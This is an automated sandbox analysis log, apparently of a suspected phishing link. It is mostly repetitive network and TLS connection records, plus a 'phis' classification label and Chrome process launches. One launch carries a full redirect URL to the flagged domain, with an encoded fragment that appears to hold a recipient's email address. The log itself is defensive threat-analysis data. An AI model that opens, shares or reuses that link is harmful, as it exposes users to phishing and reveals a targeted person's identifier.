Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 44.241.220.131:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.233.43.104:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.164:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49921 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.154.8:443 -> 192.168.2.16:49924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49937 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.22.4.65:443 -> 192.168.2.16:49948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49956 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.11.120:443 -> 192.168.2.16:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49987 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49990 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.16:49991 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.16:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50020 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50046 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50045 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50047 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:50064 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:50065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:50080 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50083 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@24/300@64/70
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2044,i,14520757653537100611,12169281315345894237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J%26s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54%26e=%23bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcN/1/010001965e9c7861-e810a570-973d-44ca-98b2-c8b768844478-000000/jtJ9ZQweb9qzOLXcWoJ9KSFZOxc=423"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2044,i,14520757653537100611,12169281315345894237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
